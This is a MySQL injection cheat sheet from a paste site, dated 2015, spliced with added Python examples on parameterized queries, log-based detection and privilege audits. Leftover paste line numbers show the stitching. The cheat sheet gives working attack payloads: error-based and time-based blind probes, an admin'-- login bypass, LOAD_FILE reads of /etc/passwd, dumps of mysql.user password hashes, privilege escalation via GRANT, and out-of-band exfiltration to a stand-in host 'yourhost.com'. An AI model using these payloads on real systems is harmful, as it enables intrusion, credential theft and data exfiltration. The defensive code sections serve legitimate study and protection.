Kyfx

MySQL Injection tutorial and cheats :)

May 21st, 2015
Initial Exploitation

Version:          SELECT @@VERSION
                  SELECT version()
Current User:     SELECT user()
                  SELECT system_user()
Current Database: SELECT database()

Quick Detection

Error Based SQLi

For integer inputs:

(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

For string inputs:

'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

The attacks above should throw 'duplicate entry' errors.

Clear SQLi Tests

These tests are simply good for boolean SQL injection and silent attacks.

product.php?id=4
product.php?id=5-1
product.php?id=4 OR 1=1
product.php?id=-1 OR 17-7=10

Blind SQL Injection (Time Based)

### Use this when you cannot see any difference in the output. Also, do not use more than 30 seconds, because the database API connection timeout could easily be reached.
### This is just like sleep: it waits for the specified time. A CPU-safe way to make the database wait.

SLEEP(25)--
SELECT BENCHMARK(1000000,MD5('A'));

Real World Samples

ProductID=1 OR SLEEP(25)=0 LIMIT 1--
ProductID=1) OR SLEEP(25)=0 LIMIT 1--
ProductID=1' OR SLEEP(25)=0 LIMIT 1--
ProductID=1') OR SLEEP(25)=0 LIMIT 1--
ProductID=1)) OR SLEEP(25)=0 LIMIT 1--
ProductID=SELECT SLEEP(25)--

Line Comments

DROP sampletable;--
DROP sampletable;#

Username : admin'--
Username : admin' or '1'='1'--

SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'

This logs you in as the admin user, because the rest of the SQL query is ignored.
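The product.php?id tests above and this admin'-- login bypass come from the same defect: a request parameter pasted into the SQL text. The following Python is an added example, not part of the original paste: it builds each query the vulnerable way and the parameterized way and runs both against an in-memory SQLite database (a constructed stand-in for MySQL so the demo runs offline; MySQL drivers such as mysql.connector or PyMySQL accept the same bound parameters with %s placeholders). The table names, sample rows and function names are assumptions made for the demo.

```python
"""
Added example (not from the original paste): the product lookup and the login
query built the vulnerable way (string concatenation) and the safe way
(type check plus bound parameters). SQLite in memory stands in for MySQL so the
demo runs offline; MySQL drivers such as mysql.connector or PyMySQL take the
same bound parameters with %s placeholders. Table names, rows and function
names are constructed for the demo.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample schema: a product table and a members table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO product VALUES (?, ?)",
                     [(4, "widget"), (5, "gadget"), (6, "gizmo")])
    # Clear-text password only to mirror the cheat sheet's query; real code compares a hash.
    conn.execute("CREATE TABLE members (username TEXT, password TEXT)")
    conn.execute("INSERT INTO members VALUES ('admin', 'correct-horse')")
    return conn


def product_unsafe(conn, raw_id: str) -> list:
    """Vulnerable: id=4, id=5-1 and id=4 OR 1=1 are all pasted straight into the SQL."""
    sql = f"SELECT name FROM product WHERE id = {raw_id} ORDER BY id"
    return [row[0] for row in conn.execute(sql).fetchall()]


def product_safe(conn, raw_id: str) -> list:
    """Hardened: the parameter must be an integer and is bound, never concatenated."""
    try:
        product_id = int(raw_id)
    except ValueError:
        return []  # '5-1' and '4 OR 1=1' are rejected before any SQL is built
    sql = "SELECT name FROM product WHERE id = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (product_id,)).fetchall()]


def login_unsafe(conn, username: str, password: str):
    """Vulnerable: username admin'-- turns the password check into a comment."""
    sql = (f"SELECT username FROM members WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username: str, password: str):
    """Hardened: with bound parameters the quote and -- are just characters in a value."""
    sql = "SELECT username FROM members WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    for raw in ("4", "5-1", "4 OR 1=1"):
        print(f"id={raw!r}: unsafe={product_unsafe(db, raw)} safe={product_safe(db, raw)}")
    for user in ("admin'--", "admin' or '1'='1'--"):
        print(f"user={user!r}: unsafe={login_unsafe(db, user, 'wrong')} "
              f"safe={login_safe(db, user, 'wrong')}")
```

The admin'-- input succeeds against login_unsafe because SQLite, like MySQL, treats -- as a line comment and drops the password check; login_safe returns None for the same input because the driver sends the username as data, not as SQL. The integer check does the same job for the id=5-1 and id=4 OR 1=1 probes: the safe version returns nothing for them instead of the same row as id=4.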
  55.  
Inline Comments

Comments out the rest of the query by not closing them; you can also use them for bypassing blacklisting, removing spaces, obfuscating, and determining database versions.

DROP/*comment*/sampletable
DR/**/OP/*bypass blacklisting*/sampletable

If Statements

Get a response based on an if statement. This is one of the key points of Blind SQL Injection; it can also be very useful for testing simple things blindly and accurately.

MySQL If Statement

IF(condition, true-part, false-part)
SELECT IF(1=1, 'true', 'false')

If Statement SQL Injection Attack Samples

SELECT IF(user()='root@localhost','true','false')

String without Quotes

SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))

This will return 'KLM'.

Bulk Insert

Dump table content into a file on the database server:

SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; --

Load File

' UNION ALL SELECT LOAD_FILE('/etc/passwd') --

SELECT LOAD_FILE(0x633A5C626F6F742E696E69)

This will show the content of c:\boot.ini (the hex literal is the path, so no quotes are needed).

Command Execution

Possible using UDFs (user defined functions).

http://packetstormsecurity.org/libra...s_0.0.3.tar.gz

Create Users

CREATE USER username IDENTIFIED BY 'password'; --

Drop Users

DROP USER username; --

Make User DBA

GRANT ALL PRIVILEGES ON *.* TO username@'%';

List Users

SELECT * FROM `user` WHERE 1 LIMIT 0,30
SELECT * FROM mysql.user WHERE 1 LIMIT 1,1
SELECT * FROM mysql.user

List Passwords

SELECT user, password FROM mysql.user
SELECT user, password FROM mysql.user LIMIT 1,1
SELECT password FROM mysql.user WHERE user = 'root'

List Databases

SELECT schema_name FROM information_schema.schemata;
SELECT schema_name FROM information_schema.schemata LIMIT 1,1;

Privileges

SELECT Super_priv FROM mysql.user WHERE user=(SELECT user) LIMIT 1,1--
SELECT Super_priv FROM mysql.user WHERE user='root' LIMIT 1,1--

Getting user defined tables

SELECT table_name FROM information_schema.tables WHERE table_schema = 'tblUsers'

tblUsers -> placeholder (table_schema is the database name)

Getting Column Names

SELECT table_name, column_name FROM information_schema.columns WHERE table_schema = 'tblUsers'

tblUsers -> placeholder (table_schema is the database name)

SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';

Finds the tables that have a column called 'username'.

Default Databases

information_schema (>= MySQL 5.0)
mysql

Path of DB files

SELECT @@datadir
C:\AppServ\MySQL\data\

Time Based SQLi Exploitation

?vulnerableParam=-99 OR IF((ASCII(MID(({INJECTION}),1,1)) = 100),SLEEP(14),1) = 0 LIMIT 1--

{INJECTION} = the query you want to run.

If the condition is true, the response arrives after 14 seconds. If it is false, it is delayed for one second.
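Time-based payloads such as the one in this section and the SLEEP/BENCHMARK samples earlier on the page leave two marks on the web server: the decoded query string contains the delay call, and the request takes about as long as the injected delay. The detector below is an added example (not from the original paste) that scans access log lines for both. The log lines are constructed for the demo in a combined-log layout with an assumed trailing response-time field in milliseconds; real log formats differ, and the function and pattern names are made up here.

```python
"""
Added example (not from the original paste): scan web server access log lines
for the time-based payloads described in this sheet (SLEEP, BENCHMARK and the
IF(..., SLEEP(n), ...) conditional delay) and for the slow responses they
cause. Log lines are constructed for the demo in a combined-log layout with an
assumed trailing response-time field in milliseconds; real log formats differ.
"""
import re
from urllib.parse import unquote_plus

# Payload fragments from the cheat sheet, matched after URL decoding, case-insensitively.
TIME_BASED_PATTERNS = {
    "sleep": re.compile(r"\bsleep\s*\(", re.I),
    "benchmark": re.compile(r"\bbenchmark\s*\(", re.I),
    "conditional_delay": re.compile(r"\bif\s*\(.*\bsleep\s*\(", re.I),
}

# ip ident user [timestamp] "METHOD url PROTO" status bytes response_ms  (last field assumed)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ (?P<ms>\d+)$'
)

SLOW_MS = 10_000  # anything slower than 10 s on a simple product page deserves a look

# Constructed sample log: one benign hit, three payloads from this sheet, one slow report.
SAMPLE_LOG = """\
10.0.0.5 - - [21/May/2015:10:00:01 +0000] "GET /product.php?id=4 HTTP/1.1" 200 512 38
10.0.0.9 - - [21/May/2015:10:00:07 +0000] "GET /product.php?id=1%20OR%20SLEEP(25)=0%20LIMIT%201-- HTTP/1.1" 200 512 25041
10.0.0.9 - - [21/May/2015:10:00:40 +0000] "GET /product.php?id=-99%20OR%20IF((ASCII(MID((SELECT%20user()),1,1))=100),SLEEP(14),1)=0%20LIMIT%201-- HTTP/1.1" 200 512 14022
10.0.0.9 - - [21/May/2015:10:01:02 +0000] "GET /product.php?id=1%20OR%20BENCHMARK(1000000,MD5(%27A%27))=0 HTTP/1.1" 200 512 9800
10.0.0.7 - - [21/May/2015:10:01:10 +0000] "GET /report.php?year=2015 HTTP/1.1" 200 9031 12400
"""


def classify(line: str):
    """Return a finding for one log line, or None if it parses as benign or not at all."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = unquote_plus(m["url"])  # decode %20, %27 etc. before matching
    hits = [name for name, pat in TIME_BASED_PATTERNS.items() if pat.search(url)]
    ms = int(m["ms"])
    slow = ms >= SLOW_MS
    if not hits and not slow:
        return None
    return {"ip": m["ip"], "url": url, "ms": ms, "patterns": hits, "slow": slow}


def scan(log_text: str) -> list:
    """Run classify over every line and keep only the findings."""
    return [f for f in (classify(line) for line in log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The last sample line is flagged on timing alone, and that is deliberate: POST bodies and headers never reach the access log, so a slow response with a clean query string still deserves correlation with the database's slow query log before it is dismissed. The BENCHMARK line shows the other gap: its 9.8 s response falls under the threshold, so the pattern match is what catches it.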
  185.  
Out of Band Channel

?vulnerableParam=-99 OR (SELECT LOAD_FILE(concat('\\\\',({INJECTION}), 'yourhost.com\\')))

Makes an NBNS query request / DNS resolution request to yourhost.com.

?vulnerableParam=-99 OR (SELECT ({INJECTION}) INTO OUTFILE '\\\\yourhost.com\\SHARE\\output.txt')

Writes data to your shared folder/file.

{INJECTION} = the query you want to run.
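The file read/write tricks on this page (LOAD_FILE, INTO OUTFILE / INTO DUMPFILE, including this out-of-band variant), the mysql.user listings and the GRANT ALL PRIVILEGES example all depend on two things: what the application's database account is allowed to do, and the server's secure_file_priv setting. The audit below is an added example, not part of the original paste: it parses the text of SHOW GRANTS FOR an account and the value of secure_file_priv and reports the conditions under which those sections work. The grant lines are constructed; the finding tags and function names are assumptions made for the demo. The secure_file_priv semantics (NULL disables file import/export, an empty string leaves it unrestricted, a directory restricts it to that directory) are MySQL's documented behaviour.

```python
"""
Added example (not from the original paste): audit of the account grants and
the secure_file_priv setting that decide whether LOAD_FILE / INTO OUTFILE,
reading mysql.user, or GRANT ALL-style escalation work through a compromised
application account. Inputs are constructed here; in practice they come from
SHOW GRANTS FOR 'app'@'%' and SHOW VARIABLES LIKE 'secure_file_priv'.
"""
import re

# Accepts both the 5.x output style (TO 'app'@'%') and the 8.0 style (TO `app`@`%`).
GRANT_RE = re.compile(
    r"^GRANT (?P<privs>.+?) ON (?P<scope>\S+) TO [`'](?P<user>[^`']*)[`']@[`'](?P<host>[^`']*)[`']"
)

# Constructed SHOW GRANTS output for a typical over-privileged web application account.
SHOW_GRANTS_APP = [
    "GRANT USAGE ON *.* TO 'app'@'%'",
    "GRANT SELECT, INSERT, UPDATE ON `shop`.* TO 'app'@'%'",
    "GRANT FILE ON *.* TO 'app'@'%'",
]

# Constructed output for the same account after least-privilege cleanup.
SHOW_GRANTS_LOCKED_DOWN = [
    "GRANT USAGE ON *.* TO 'app'@'10.0.0.%'",
    "GRANT SELECT, INSERT, UPDATE ON `shop`.* TO 'app'@'10.0.0.%'",
]


def parse_grants(lines):
    """Return (privilege set, scope, host) triples from SHOW GRANTS lines."""
    grants = []
    for line in lines:
        m = GRANT_RE.match(line.strip())
        if not m:
            continue  # ignore anything that is not a GRANT statement
        privs = {p.strip().upper() for p in m["privs"].split(",")}
        scope = m["scope"].replace("`", "")  # `mysql`.* -> mysql.*
        grants.append((privs, scope, m["host"]))
    return grants


def audit(show_grants_lines, secure_file_priv):
    """Return finding tags, in the order found, for one account plus the server setting."""
    findings = []
    for privs, scope, host in parse_grants(show_grants_lines):
        if host == "%":
            findings.append("HOST_WILDCARD")       # account usable from any client address
        if scope == "*.*" and privs & {"FILE", "ALL PRIVILEGES"}:
            findings.append("FILE_PRIV")           # LOAD_FILE / INTO OUTFILE / INTO DUMPFILE possible
        if scope == "*.*" and privs & {"SUPER", "ALL PRIVILEGES"}:
            findings.append("SUPER_PRIV")          # server-admin level account
        if scope in ("*.*", "mysql.*") and privs & {"SELECT", "ALL PRIVILEGES"}:
            findings.append("MYSQL_SCHEMA_READ")   # mysql.user (users, password hashes) readable
    # secure_file_priv: NULL disables import/export, '' leaves it unrestricted,
    # a directory restricts LOAD_FILE and INTO OUTFILE to that directory.
    if secure_file_priv is not None and str(secure_file_priv).upper() != "NULL":
        if str(secure_file_priv) == "":
            findings.append("SECURE_FILE_PRIV_EMPTY")
    return list(dict.fromkeys(findings))  # de-duplicate, keeping first-seen order


if __name__ == "__main__":
    print(audit(SHOW_GRANTS_APP, ""))            # over-privileged: FILE grant, wildcard host, open file priv
    print(audit(SHOW_GRANTS_LOCKED_DOWN, None))  # least privilege: nothing to report
```

FILE_PRIV is the finding that matters most for this page: without the FILE privilege on *.* (directly or through ALL PRIVILEGES) the LOAD_FILE and INTO OUTFILE statements fail regardless of the injection, and with secure_file_priv set to NULL they fail even for accounts that hold it. HOST_WILDCARD is what makes the GRANT ... TO username@'%' example dangerous: a wildcard host lets the account be used from anywhere the server is reachable.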